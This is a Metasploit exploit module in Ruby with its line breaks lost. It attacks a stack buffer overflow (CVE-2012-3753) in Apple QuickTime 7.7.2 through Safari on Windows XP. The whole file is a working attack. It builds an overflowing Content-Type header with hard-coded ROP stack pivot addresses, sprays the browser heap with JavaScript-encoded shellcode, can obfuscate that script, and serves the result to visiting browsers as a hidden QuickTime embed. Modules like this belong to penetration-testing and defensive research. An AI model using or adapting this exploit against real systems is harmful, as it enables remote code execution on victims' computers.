|
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::Egghunter include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_name => OperatingSystems::WINDOWS, :ua_name => HttpClients::SAFARI, :ua_maxver => '5.0.1', :ua_maxver => '5.1.7', :javascript => true, :rank => NormalRanking, # reliable memory corruption :vuln_test => nil })
def initialize(info = {}) super(update_info(info, 'Name' => 'Apple QuickTime 7.7.2 MIME Type Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in Apple QuickTime 7.7.2. The stack based overflow occurs when processing a malformed Content-Type header. The module has been tested successfully on Safari 5.1.7 and 5.0.7 on Windows XP SP3. }, 'Author' => [ 'Pavel Polischouk', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-3753' ], [ 'OSVDB', '87088'], [ 'BID', '56438' ], [ 'URL', 'http://support.apple.com/kb/HT5581' ], [ 'URL', 'http://asintsov.blogspot.com.es/2012/11/heapspray.html' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'Platform' => 'win', 'Targets' => [ # Tested with QuickTime 7.7.2 [ 'Automatic', {} ], [ 'Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2', { 'OffsetFirstStackPivot' => 389, 'OffsetSecondStackPivot' => 105, 'FirstStackPivot' => 0x671a230b, # ADD ESP,4B8 # RETN # Quicktime.qts, 'SecondStackPivot' => 0x67123437, # pop esp / ret # Quicktime.qts 'SprayOffset' => 264, 'SprayedAddress' => 0x60130124 } ], [ 'Windows XP SP3 / Safari 5.0.5 / Apple QuickTime Player 7.7.2', { 'OffsetFirstStackPivot' => 389, 'OffsetSecondStackPivot' => 105, 'FirstStackPivot' => 0x671a230b, # ADD ESP,4B8 # RETN # Quicktime.qts, 'SecondStackPivot' => 0x67123437, # pop esp / ret # Quicktime.qts 'SprayOffset' => 264, 'SprayedAddress' => 0x60130124 } ] ], 'Privileged' => false, 'DisclosureDate' => 'Nov 07 2012', 'DefaultTarget' => 0))
register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class ) end
def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
browser_name = "" if agent =~ /Safari/ and agent=~ /Version\/5\.1\.7/ browser_name = "Safari 5.1.7" elsif agent =~ /Safari/ and agent=~ /Version\/5\.0\.5/ browser_name = "Safari 5.0.5" end
os_name = 'Windows XP SP3'
targets.each do |t| if (!browser_name.empty? and t.name.include?(browser_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end
return nil end
def on_request_uri(client, request)
agent = request.headers['User-Agent'] my_target = get_target(agent)
# Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? print_error("Browser not supported: #{agent}") send_not_found(cli) return end
return if ((p = regenerate_payload(client)) == nil)
if request.uri =~ /\.smil$/ print_status("Sending exploit (target: #{my_target.name})") smil = rand_text_alpha(20) type = rand_text_alpha_lower(1) subtype = rand_text_alpha_lower(my_target['OffsetSecondStackPivot']) subtype << [my_target['SecondStackPivot']].pack("V") subtype << [my_target['SprayedAddress']].pack("V") subtype << rand_text_alpha_lower(my_target['OffsetFirstStackPivot'] - subtype.length) subtype << rand_text_alpha_lower(4) subtype << [my_target['FirstStackPivot']].pack("V") subtype << rand_text_alpha_lower(10000 - subtype.length) send_response(client, smil, { 'Content-Type' => "#{type}/#{subtype}" }) else print_status("Sending initial HTML") url = ((datastore['SSL']) ? "https://" : "http://") url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST']) url << ":" + datastore['SRVPORT'].to_s url << get_resource fname = rand_text_alphanumeric(4)
code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'}) js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(my_target.arch)) offset = rand_text(my_target['SprayOffset']) js_offset = Rex::Text.to_unescape(offset, Rex::Arch.endian(my_target.arch)) fill = rand_text(4) js_fill = Rex::Text.to_unescape(fill, Rex::Arch.endian(my_target.arch))
# Heap Spray based on http://asintsov.blogspot.com.es/2012/11/heapspray.html js = <<-JSSPRAY function heapSpray(offset, shellcode, fillsled) { var chunk_size, headersize, fillsled_len, code; var i, codewithnum; chunk_size = 0x40000; headersize = 0x10; fillsled_len = chunk_size - (headersize + offset.length + shellcode.length); while (fillsled.length <fillsled_len) fillsled += fillsled; fillsled = fillsled.substring(0, fillsled_len); code = offset + shellcode + fillsled; heap_chunks = new Array(); for (i = 0; i<1000; i++) { codewithnum = "HERE" + code; heap_chunks[i] = codewithnum.substring(0, codewithnum.length); } } var myoffset = unescape("#{js_offset}"); var myshellcode = unescape("#{js_code}"); var myfillsled = unescape("#{js_fill}"); heapSpray(myoffset,myshellcode,myfillsled); JSSPRAY
if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end
content = "<html>" content << "<head><script>" content << "#{js}" content << "</script></head>" content << "<body>" content << <<-ENDEMBED <OBJECT CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" WIDTH="1" HEIGHT="1" CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab"> <PARAM name="SRC" VALUE = "#{url}/#{fname}.smil"> <PARAM name="QTSRC" VALUE = "#{url}/#{fname}.smil"> <PARAM name="AUTOPLAY" VALUE = "true" > <PARAM name="TYPE" VALUE = "video/quicktime" > <PARAM name="TARGET" VALUE = "myself" > <EMBED SRC = "#{url}/#{fname}.smil" QTSRC = "#{url}/#{fname}.smil" TARGET = "myself" WIDTH = "1" HEIGHT = "1" AUTOPLAY = "true" PLUGIN = "quicktimeplugin" TYPE = "video/quicktime" CACHE = "false" PLUGINSPAGE= "http://www.apple.com/quicktime/download/" > </EMBED> </OBJECT> ENDEMBED content << "</body></html>" send_response(client, content, { 'Content-Type' => "text/html" }) end
# Handle the payload handler(client) end
end
|